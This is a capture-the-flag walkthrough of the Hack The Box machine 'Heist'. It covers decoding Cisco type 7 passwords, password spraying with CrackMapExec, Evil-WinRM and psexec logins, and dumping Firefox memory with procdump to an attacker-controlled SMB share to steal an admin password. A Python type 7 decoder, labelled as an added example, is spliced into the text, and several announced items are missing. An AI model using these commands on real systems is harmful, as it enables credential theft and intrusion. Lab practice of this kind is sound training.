Again, we start with nmap -sC -sV -oA ./heist 10.10.10.149
We have HTTP and SMB. Let's start with the web page. It looks like a simple Login.
It looks like we can log in as Guest. When we do, we are given what looks like a Technical Support conversation.
The initiating comment of the conversation has an attachment that contains:
OK. Tangent time. I have actually seen people do this IRL and the fact that they are in IT terrifies me to no end. That attachment contains all of the router/switch administrator passwords!!!! NEVER put something like that on any kind of public forum. That's just........I seriously have no words. Hazard should be cleaning out his desk right about now.
OK.....I'm better now. So, there are DOZENS of sites dedicated to cracking Cisco passwords. For example, https://www.ifm.net.nz/cookbooks/passwordcracker.html takes that type 7 admin password "hash" of 02375012182C1A1D751618034F36415408 and cracks it into "Q4)sJu\Y8qz*A3?d" in less than a second. It takes 0242114B0E143F015F5D1E161713 and turns it into "$uperP@ssword". However, the type 5 one requires a little bit of John cracking. I drop the hash into a "type5" file and set John to work with:
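To show why those type 7 strings fall in under a second, here is an added example (not part of the original write-up) that reverses the type 7 scheme and audits a config for it: every IOS device XORs the password with the same fixed, publicly documented key, so "password 7" lines are obfuscation to rotate and replace with type 8/9 (PBKDF2/scrypt) secrets, while type 5 and later are real one-way hashes and are left alone. The sample config fragment, its usernames and the type 5 placeholder are constructed; the two type 7 values are the ones from the attachment above.

```python
import re

# Fixed key shared by every IOS device for type 7 (publicly documented).
XLAT_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits give the key offset,
    the rest is hex byte pairs, each XORed with the next key byte."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded.isalnum():
        raise ValueError("not a type 7 string: %r" % encoded)
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ XLAT_KEY[(offset + i) % len(XLAT_KEY)]
                 for i, b in enumerate(data)).decode("ascii")


# Matches "password 7 <hex>" and "secret 7 <hex>"; type 5/8/9 do not match.
TYPE7_RE = re.compile(r"\b(?:password|secret)\s+7\s+([0-9A-Fa-f]+)")


def audit_config(config_text: str) -> dict:
    """Map every type 7 string in a config to the plaintext it hides,
    so an auditor can see exactly which credentials must be rotated."""
    found = {}
    for line in config_text.splitlines():
        m = TYPE7_RE.search(line)
        if m:
            found[m.group(1)] = decode_type7(m.group(1))
    return found


# Constructed config fragment (usernames invented, type 5 value is a placeholder).
SAMPLE_CONFIG = """\
username netops password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 5 $1$salt$PLACEHOLDER_MD5_HASH
"""

if __name__ == "__main__":
    for enc, clear in audit_config(SAMPLE_CONFIG).items():
        print("type 7 %s -> %s (rotate and re-encode as type 8/9)" % (enc, clear))
```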
So, to recap, we have the following credentials already:
Looking at the Issues page, we can also guess that Hazard is another username we can use. I'm going to use every variation of admin, administrator, support admin, etc. as well. So, we have 9 usernames and 3 passwords.
We are setting up for a sort of password spray attack. I've dropped these users and passwords into separate txt files.
Now, we can run CrackMapExec and spray those users with those passwords.
crackmapexec smb 10.10.10.149 ./users.txt -p ./pass.txt
Lo and behold! Our old buddy Hazard reused the type 5 stealth1agent password. I try smbclient, but that was an enormous fail. Hazard has no access, which is probably a good thing. Let's try WinRM. Nope. Another fail. RID brute forcing??
Finally! Something worked. We now have a few more usernames to try. So, I change the users.txt with those new usernames (drop the old ones) of:
Use the same password spray we did before and we find Chase's password. At least his looks randomized XD. Evil-WinRM gets us our initial foothold:
evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
We type out the todo.txt file in Chase's Desktop folder and we see that his #1 item is to constantly check that issues page. Running Get-Process shows that he is using Firefox to check that site. Let's see if we can dump the memory of those Firefox processes in case they have goodies. To do that, we need the smbserver.py script again.
On the attacking machine, one level up from the procdump64.exe file:
sudo python3 /impacket/examples/smbserver.py -smb2support -username guest -password guest share ProcDump
net use x: \\10.10.14.28\share /user:guest guest
cp x:\procdump64.exe ./procdump.exe
.\procdump.exe -ma 6184 firefox.dmp
cp .\firefox.dmp x:\firefox.dmp
If we intercept a login request to the page, we see that login_username and login_password are the variables the page expects for authentication. So, we can use "strings" to search the dmp file for login_password, and we get this hit:
"C:\Program Files\Mozilla Firefox\firefox.exe" firstname.lastname@example.org&login_password=4dD!5}x/re8]FBuZ&login=
Now, we can try to evil-winrm as admin! aaaannnnddd EPIC fail XD
Let's try psexec instead. Awesome! That one worked. Grab your flags and grab a beer! Celebration time